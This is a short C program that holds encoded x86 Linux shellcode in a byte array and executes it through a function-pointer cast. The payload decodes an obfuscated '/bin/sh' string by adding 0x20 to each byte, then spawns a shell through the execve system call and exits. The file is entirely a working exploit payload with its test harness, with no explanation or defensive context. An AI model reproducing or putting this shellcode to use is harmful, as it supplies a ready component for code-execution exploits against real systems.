void main() 
{  
	char shellcode[] =  
	"\xeb\x29"  
	"\x5e"  
	"\x29\xc9"  
	"\x89\xf3"  
	"\x89\x5e\x08"  
	"\xb1\x07"  
	"\x80\x03\x20"  
	"\x43"  
	"\xe0\xfa"  
	"\x29\xc0"  
	"\x88\x46\x07"  
	"\x89\x46\x0c"  
	"\xb0\x0b"  
	"\x87\xf3"  
	"\x8d\x4b\x08"  
	"\x8d\x53\x0c"  
	"\xcd\x80"  
	"\x29\xc0"  
	"\x40"  
	"\xcd\x80"  
	"\xe8\xd2\xff\xff\xff"  
	"\x0f\x42\x49\x4e\x0f\x53\x48";
	(*(void(*)()) shellcode)();
}